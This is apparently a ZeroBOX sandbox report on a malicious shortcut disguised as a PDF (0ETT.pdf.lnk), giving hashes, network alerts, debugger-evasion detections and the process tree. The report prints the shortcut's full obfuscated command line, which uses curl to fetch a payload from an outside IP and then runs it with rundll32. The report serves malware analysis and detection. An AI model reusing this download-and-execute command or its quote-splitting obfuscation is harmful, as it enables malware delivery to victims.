Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 1, 2023, 4:45 p.m.	Oct. 1, 2023, 4:47 p.m.

Size	2.1KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Wed Oct 6 04:51:36 2021, mtime=Thu Sep 28 04:48:23 2023, atime=Wed Oct 6 04:51:36 2021, length=289792, window=hidenormalshowminimized
MD5	`eb895053a7bee85c754348f1eea7b020`
SHA256	`fa136fa7662c8ee83055e140d5e1d293a02c98c84d6ab7d7167b01dd6b452f44`
CRC32	`922574BD`
ssdeep	`24:8a/WJCnQcV0RA8vWY+/6VoUJpShLVDzi85yMjHM0:8aN6i0VVoopShLx6IH`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "tUORfmrQsA" C:\Users\test22\AppData\Local\Temp\0ETT.pdf.lnk
2556
- cmd.exe "C:\Windows\System32\cmd.exe" /c aV6J || echo aV6J & P"iNg" aV6J || c"urL" ht"tp:"//155.1"3"8.2"23."11"5"/"e"M19/a -o C:\Users\test22\AppData\Local\Temp\aV6J.log & P"iNg" -n 3 aV6J || ru"ND"l"l"32 C:\Users\test22\AppData\Local\Temp\aV6J.log scab /k pechene634 & eXi"t" 'lUHVWSnwsPjFk
  2668
  - PING.EXE P"iNg" aV6J
    2764
  - curl.exe c"urL" ht"tp:"//155.1"3"8.2"23."11"5"/"e"M19/a -o C:\Users\test22\AppData\Local\Temp\aV6J.log
    2824
  - PING.EXE P"iNg" -n 3 aV6J
    2884
  - rundll32.exe ru"ND"l"l"32 C:\Users\test22\AppData\Local\Temp\aV6J.log scab /k pechene634
    2932

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
155.138.223.115	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49166 -> 155.138.223.115:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.101:49166 -> 155.138.223.115:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Command line console output was observed (5 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 1, 2023, 4:45 p.m.	buffer: 'aV6J' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Oct. 1, 2023, 4:45 p.m.	buffer: aV6J console_handle: 0x00000007	1	1
WriteConsoleW Oct. 1, 2023, 4:45 p.m.	buffer: 'eXi"t"' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleA Oct. 1, 2023, 4:45 p.m.	buffer: Ping request could not find host aV6J. Please check the name and try again. console_handle: 0x00000007	1	1
WriteConsoleA Oct. 1, 2023, 4:45 p.m.	buffer: Ping request could not find host aV6J. Please check the name and try again. console_handle: 0x00000007	1	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://155.138.223.115/eM19/a

Performs some HTTP requests (1 event)

request

GET http://155.138.223.115/eM19/a

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\0ETT.pdf.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c aV6J || echo aV6J & P"iNg" aV6J || c"urL" ht"tp:"//155.1"3"8.2"23."11"5"/"e"M19/a -o C:\Users\test22\AppData\Local\Temp\aV6J.log & P"iNg" -n 3 aV6J || ru"ND"l"l"32 C:\Users\test22\AppData\Local\Temp\aV6J.log scab /k pechene634 & eXi"t" 'lUHVWSnwsPjFk

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

155.138.223.115

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2556 resumed a thread in remote process 2668
NtResumeThread Oct. 1, 2023, 4:45 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2668	1	0	0

0ETT.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All